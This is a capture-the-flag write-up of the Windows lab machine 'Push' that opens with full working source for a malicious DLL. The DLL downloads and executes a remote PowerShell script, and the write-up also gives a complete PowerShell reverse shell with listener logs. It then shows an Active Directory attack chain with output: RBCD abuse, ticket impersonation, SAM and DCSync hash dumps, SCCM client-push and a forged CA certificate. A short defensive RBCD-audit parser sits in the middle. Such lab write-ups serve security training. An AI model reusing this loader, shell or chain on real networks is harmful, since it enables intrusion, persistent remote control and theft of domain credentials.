vulnlab-push

a hard windows machine

preparation

create puck.c on the Kali box

puck.c contains:

#include <windows.h>
#include <stdlib.h>   /* system() */

BOOL WINAPI DllMain(HANDLE hDll, DWORD dwReason, LPVOID lpReserved) {
    switch (dwReason) {
        case DLL_PROCESS_ATTACH:
            /* runs once when the DLL is loaded: fetch puckshell.txt and run it */
            system("powershell IEX ([System.Text.Encoding]::ASCII.GetString((New-Object Net.Webclient).DownloadData('http://192.168.36.116:9000/puckshell.txt')))");
            break;
        case DLL_PROCESS_DETACH:
            break;
        case DLL_THREAD_ATTACH:
            break;
        case DLL_THREAD_DETACH:
            break;
    }
    return TRUE;
}

create the malicious DLL

puck@kali:~$ x86_64-w64-mingw32-gcc ./puck.c -shared -o puck.dll
puck@kali:~$ file puck.dll
puck.dll: PE32+ executable (DLL) (console) x86-64, for MS Windows

puckshell.txt contains:

function cleanup {
    if ($client.Connected -eq $true) {$client.Close()}
    if ($process.ExitCode -ne $null) {$process.Close()}
    exit
}
# Setup IPADDR
$address = '192.168.1.136'
# Setup PORT
$port = '443'
$client = New-Object system.net.sockets.tcpclient
$client.connect($address,$port)
$stream = $client.GetStream()
$networkbuffer = New-Object System.Byte[] $client.ReceiveBufferSize
$process = New-Object System.Diagnostics.Process
$process.StartInfo.FileName = 'C:\\windows\\system32\\cmd.exe'
$process.StartInfo.RedirectStandardInput = 1
$process.StartInfo.RedirectStandardOutput = 1
$process.StartInfo.UseShellExecute = 0
$process.Start()
$inputstream = $process.StandardInput
$outputstream = $process.StandardOutput
Start-Sleep 1
$encoding = new-object System.Text.AsciiEncoding
# send the initial cmd.exe banner/prompt to the listener
while($outputstream.Peek() -ne -1){$out += $encoding.GetString($outputstream.Read())}
$stream.Write($encoding.GetBytes($out),0,$out.Length)
$out = $null; $done = $false; $testing = 0;
while (-not $done) {
    if ($client.Connected -ne $true) {cleanup}
    $pos = 0; $i = 1
    # read from the socket until a newline arrives or the buffer is full
    while (($i -gt 0) -and ($pos -lt $networkbuffer.Length)) {
        $read = $stream.Read($networkbuffer,$pos,$networkbuffer.Length - $pos)
        $pos+=$read; if ($pos -and ($networkbuffer[0..$($pos-1)] -contains 10)) {break}
    }
    if ($pos -gt 0) {
        $string = $encoding.GetString($networkbuffer,0,$pos)
        $inputstream.write($string)
        start-sleep 1
        if ($process.ExitCode -ne $null) {cleanup}
        else {
            $out = $encoding.GetString($outputstream.Read())
            while($outputstream.Peek() -ne -1){
                $out += $encoding.GetString($outputstream.Read()); if ($out -eq $string) {$out = ''}
            }
            $stream.Write($encoding.GetBytes($out),0,$out.length)
            $out = $null
            $string = $null
        }
    } else {cleanup}
}

On the attacker PC run an HTTP listener and an nc listener

c:\PENTEST>python3 -m http.server 9000
Serving HTTP on :: port 9000 (http://[::]:9000/) ...
::ffff:192.168.36.91 - - [22/Jul/2024 10:49:46] "GET /puckshell.txt HTTP/1.1" 200 -
::ffff:192.168.36.91 - - [22/Jul/2024 10:50:32] "GET /puckshell.txt HTTP/1.1" 200 -
c:\PENTEST>nc64.exe -nlvp 443
listening on [any] 443 ...
connect to [192.168.36.116] from (UNKNOWN) [192.168.36.91] 58868
Microsoft Windows [Version 10.0.22631.3880]
(c) Microsoft Corporation. Alle rechten voorbehouden.

C:\Windows\System32>whoami
fakedomain\hillie

test on the Windows target with

rundll32.exe C:\Payloads\puck.dll,XYZ

If all tests are successful, we continue to the writeup.

Writeup:

To abuse ClickOnce we follow the article: we need to upload our SelfService.dll.deploy, which will download and execute a reverse shell.

More to come …

With a shell as kelly.hill we find her credentials in her home folder

evil-winrm --ip ms01.push.vl -u 'kelly.hill' -p 'Sh<redacted>!'
xfreerdp /u:kelly.hill /p:'Sh<redacted>!' /v:ms01.push.vl /cert:ignore /rfx

BloodHound analysis:

bloodhound-python -d push.vl -v --zip -c all -u 'olivia.wood' -p 'DeployTrust07' -ns 10.10.198.149 --dns-tcp

Check the machine account quota

crackmapexec ldap dc01.push.vl -u "Olivia.Wood" -p "DeployTrust07" -M maq

RBCD abuse

From BloodHound we see that kelly.hill has First Degree Object Control over MS01: AllExtendedRights and WriteAccountRestrictions. That means we can read all properties of MS01 and, because WriteAccountRestrictions covers msDS-AllowedToActOnBehalfOfOtherIdentity, we can edit that attribute to set up RBCD (Resource-Based Constrained Delegation).

┌──(puck㉿kali)-[~/vulnlab/push]
└─$ impacket-addcomputer -method LDAPS -computer-name 'puckie' -computer-pass 'Summer2024!' -dc-host dc01.push.vl -domain-netbios push.vl 'push.vl/kelly.hill:Sh<redacted>i!'     
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Successfully added machine account puckie$ with password Summer2024!.
┌──(puck㉿kali)-[~/vulnlab/push]
└─$ impacket-rbcd -delegate-from 'puckie$' -delegate-to 'MS01$' -action 'write' 'push.vl/kelly.hill:Sh<redacted>i!' 
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Accounts allowed to act on behalf of other identity:
[*] Delegation rights modified successfully!
[*] puckie$ can now impersonate users on MS01$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*]     puckie$      (S-1-5-21-1451457175-172047642-1427519037-3603)
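The attribute written above is what a defender should audit: msDS-AllowedToActOnBehalfOfOtherIdentity is a binary security descriptor whose DACL lists the SIDs allowed to delegate to MS01$, so any SID that is not on an approved list (here: a fresh machine account like puckie$) is a finding. The following Python is an added example, not part of the original writeup or of Impacket: it builds a constructed descriptor (the puckie$ SID from the output above plus one hypothetical approved SID) and parses the DACL back into SIDs; on a real domain the bytes would come from an LDAP read of the attribute instead.

```python
import struct

FULL_CONTROL = 0x000F01FF  # access mask Impacket's rbcd.py writes for an allowed account

def build_sid(sid_str):
    # "S-1-5-21-..." -> binary SID: revision, subauth count, 6-byte big-endian authority, LE subauths
    parts = sid_str.split("-")
    subs = [int(p) for p in parts[3:]]
    return (struct.pack("<BB", int(parts[1]), len(subs)) + int(parts[2]).to_bytes(6, "big")
            + b"".join(struct.pack("<I", s) for s in subs))

def parse_sid(buf, off):
    rev, count = buf[off], buf[off + 1]
    auth = int.from_bytes(buf[off + 2:off + 8], "big")
    subs = struct.unpack_from("<%dI" % count, buf, off + 8)
    return "S-%d-%d-%s" % (rev, auth, "-".join(map(str, subs)))

def build_descriptor(sids):
    # Constructed self-relative SECURITY_DESCRIPTOR holding only a DACL, one ACCESS_ALLOWED ACE per SID
    aces = b""
    for s in sids:
        sid = build_sid(s)
        aces += struct.pack("<BBHI", 0, 0, 8 + len(sid), FULL_CONTROL) + sid  # type 0 = ACCESS_ALLOWED
    acl = struct.pack("<BBHHH", 2, 0, 8 + len(aces), len(sids), 0) + aces   # ACL_REVISION = 2
    return struct.pack("<BBHIIII", 1, 0, 0x8004, 0, 0, 0, 20) + acl        # SE_SELF_RELATIVE|SE_DACL_PRESENT

def allowed_to_act(sd):
    # Walk the DACL of msDS-AllowedToActOnBehalfOfOtherIdentity; return [(sid, mask)] per ACCESS_ALLOWED ACE
    if len(sd) < 20:
        return []
    rev, _, control, _, _, _, dacl_off = struct.unpack_from("<BBHIIII", sd, 0)
    if rev != 1 or not control & 0x0004 or dacl_off == 0:   # no DACL present: nobody may delegate
        return []
    ace_count = struct.unpack_from("<BBHHH", sd, dacl_off)[3]
    off, entries = dacl_off + 8, []
    for _ in range(ace_count):
        ace_type, _, ace_size = struct.unpack_from("<BBH", sd, off)
        if ace_type == 0:
            mask, = struct.unpack_from("<I", sd, off + 4)
            entries.append((parse_sid(sd, off + 8), mask))
        off += ace_size
    return entries

def unexpected_delegators(sd, approved):
    # Any account allowed to act on behalf of others that is not on the approved list is a finding
    return [sid for sid, _ in allowed_to_act(sd) if sid not in approved]

PUCKIE_SID = "S-1-5-21-1451457175-172047642-1427519037-3603"    # puckie$, from the impacket-rbcd output
APPROVED_SID = "S-1-5-21-1451457175-172047642-1427519037-1105"  # hypothetical approved delegator
SAMPLE_SD = build_descriptor([APPROVED_SID, PUCKIE_SID])        # constructed attribute value
```

Running unexpected_delegators(SAMPLE_SD, {APPROVED_SID}) returns only the puckie$ SID, which is the alert a periodic audit of computer objects should raise.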
                                                                                                                                        
┌──(puck㉿kali)-[~/vulnlab/push]
└─$ impacket-getST -spn 'cifs/ms01.push.vl' -impersonate 'administrator' 'push.vl/puckie$:Summer2024!'  
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in administrator@cifs_ms01.push.vl@PUSH.VL.ccache
                                                                                                                                        
┌──(puck㉿kali)-[~/vulnlab/push]
└─$ export KRB5CCNAME=administrator@cifs_ms01.push.vl@PUSH.VL.ccache            

                                                                                                                                        
┌──(puck㉿kali)-[~/vulnlab/push]
└─$ impacket-secretsdump -k ms01.push.vl
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x1a2f736cde34f0733b3cc6f7ec68c413
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:d8<redacted>61:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:d7da45674bae3a0476c0f64b67121f7d:::
[*] Dumping cached domain logon information (domain/username:hash)
PUSH.VL/Administrator:$DCC2$10240#Administrator#33<redacted>09: (2023-08-31 18:27:31)
PUSH.VL/Kelly.Hill:$DCC2$10240#Kelly.Hill#b0<redacted>29: (2023-09-02 11:17:04)
PUSH.VL/sccadmin:$DCC2$10240#sccadmin#0c<redacted>5c: (2023-08-31 10:26:08)

Now that we have the Administrator hash of MS01, we can log in with it:

┌──(puck㉿kali)-[~/vulnlab/push]
└─$ evil-winrm --ip ms01.push.vl -u 'Administrator' -H 'd8<redacted>61'
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..
*Evil-WinRM* PS C:\Users\kelly.hill\documents> dir


    Directory: C:\Users\kelly.hill\documents


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----         7/25/2024   7:39 AM        1125376 SharpSCCM.exe


*Evil-WinRM* PS C:\Users\kelly.hill\documents> .\SharpSCCM.exe local site-info

  _______ _     _ _______  ______  _____  _______ _______ _______ _______
  |______ |_____| |_____| |_____/ |_____] |______ |       |       |  |  |
  ______| |     | |     | |    \_ |       ______| |______ |______ |  |  |    @_Mayyhem

[+] Connecting to \\127.0.0.1\root\CCM
[+] Executing WQL query: SELECT Name,CurrentManagementPoint FROM SMS_Authority
-----------------------------------
SMS_Authority
-----------------------------------
CurrentManagementPoint: DC01.push.vl
Name: SMS:HQ0
-----------------------------------
[+] Completed execution in 00:00:00.2090991
*Evil-WinRM* PS C:\Users\kelly.hill\documents> 



┌──(sccmhunter)─(puck㉿kali)-[~/vulnlab/push/sccmhunter]
└─$ python3 sccmhunter.py find -u 'sccadmin' -p '7u<redacted>JM' -dc-ip 10.10.188.181 -d push.vl -ldaps 
SCCMHunter v1.0.5 by @garrfoster
[10:15:22] INFO     [*] Checking for System Management Container.                                                    
[10:15:22] INFO     [+] Found System Management Container. Parsing DACL.                                             
[10:15:22] INFO     [-] System Management Container not found.                                                       
[10:15:22] INFO     [*] Searching LDAP for anything containing the strings 'SCCM' or 'MECM'                          
[10:15:23] INFO     [-] No results found.

┌──(sccmhunter)─(puck㉿kali)-[~/vulnlab/push/sccmhunter]
└─$ python3 sccmhunter.py smb -u 'sccadmin' -p '7u<redacted>JM' -dc-ip 10.10.188.181 -d push.vl -ldaps 
SCCMHunter v1.0.5 by @garrfoster
[10:17:30] INFO     [-] No SiteServers found in database.                                                            
[10:17:30] INFO     [-] No Management Points found in database.                                                      
[10:17:30] INFO     [-] No computers found in database.

I could not solve the sccadmin exploit.

It should run like below, giving the hash in Responder

PS C:\Users\kelly.hill\Documents> .\SharpSCCM.exe invoke client-push -t 10.8.2.138 -mp DC01.push.vl -sc HQ0
.\SharpSCCM.exe invoke client-push -t 10.8.2.138 -mp DC01.push.vl -sc HQ0

  _______ _     _ _______  ______  _____  _______ _______ _______ _______
  |______ |_____| |_____| |_____/ |_____] |______ |       |       |  |  |
  ______| |     | |     | |    \_ |       ______| |______ |______ |  |  |    @_Mayyhem

[+] Created "ConfigMgr Client Messaging" certificate in memory for device registration and signing/encrypting subsequent messages
[+] Reusable Base64-encoded certificate:

    308209D20201033082098E06092A864886F70D010701A082097F0482097B308209773082059006092A864886F70D010701A00207D0

[+] Discovering local properties for client registration request
[+] Modifying client registration request properties:
      FQDN: 10.8.2.138
      NetBIOS name: 10.8.2.138
      Site code: HQ0
[+] Sending HTTP registration request to DC01.push.vl:80
[+] Received unique SMS client GUID for new device:

    GUID:7D070746-617E-4763-9835-F7811A6BED54

[+] Discovering local properties for DDR inventory report
[+] Modifying DDR and inventory report properties
[+] Discovered PlatformID: Microsoft Windows NT Advanced Server 10.0
[+] Modified PlatformID: Microsoft Windows NT Workstation 2010.0
[+] Sending DDR from GUID:7D070746-617E-4763-9835-F7811A6BED54 to MP_DdrEndpoint endpoint on DC01.push.vl:HQ0 and requesting client installation on 10.8.0.233
[+] Completed execution in 00:00:06.9340974


As we now have the password of user sccadmin, we do a Golden Ticket attack

┌──(puck㉿kali)-[~/vulnlab/push]
└─$ crackmapexec smb dc01.push.vl -u "sccadmin" -p "7u<redacted>JM"          
SMB         DC01.push.vl    445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:push.vl) (signing:True) (SMBv1:False)
SMB         DC01.push.vl    445    DC01             [+] push.vl\sccadmin:7u<redacted>JM 

A Golden Certificate attack with certipy-ad and PassTheCert is possible because we have SYSTEM access to MS01 (which is the CA)

┌──(puck㉿kali)-[~/vulnlab/push]
└─$ certipy-ad ca -u sccadmin -p '7u<redacted>JM' -target-ip MS01.push.vl -backup
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Creating new service
[*] Creating backup
[*] Retrieving backup
[*] Got certificate and private key
[*] Saved certificate and private key to 'CA.pfx'
[*] Cleaning up
┌──(puck㉿kali)-[~/vulnlab/push]
└─$ certipy-ad forge -ca-pfx CA.pfx -upn administrator@push.vl -subject 'CN=Administrator,CN=Users,DC=PUSH,DC=VL'
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Saved forged certificate and private key to 'administrator_forged.pfx'
┌──(puck㉿kali)-[~/vulnlab/push]
└─$ certipy-ad cert -pfx administrator_forged.pfx -nokey -out administrator.crt
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Writing certificate and  to 'administrator.crt'
┌──(puck㉿kali)-[~/vulnlab/push]
└─$ certipy-ad cert -pfx administrator_forged.pfx -nocert -out administrator.key
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Writing private key to 'administrator.key'
┌──(puck㉿kali)-[~/vulnlab/push]
└─$ python3 passthecert.py -action modify_user -crt administrator.crt -key administrator.key -target kelly.hill -elevate -domain push.vl -dc-host dc01.push.vl
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Granted user 'kelly.hill' DCSYNC rights!
┌──(puck㉿kali)-[~/vulnlab/push]
└─$ impacket-secretsdump kelly.hill@DC01.push.vl 
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

Password:
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0d<redacted>0f:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:d9fd5a3d1406ca03668fcd04a0b4eb09:::
push.vl\svcsql:1104:aad3b435b51404eeaad3b435b51404ee:19<redacted>85:::

That was fun 🙂


References used

sccm

PassTheCert

sharpcollection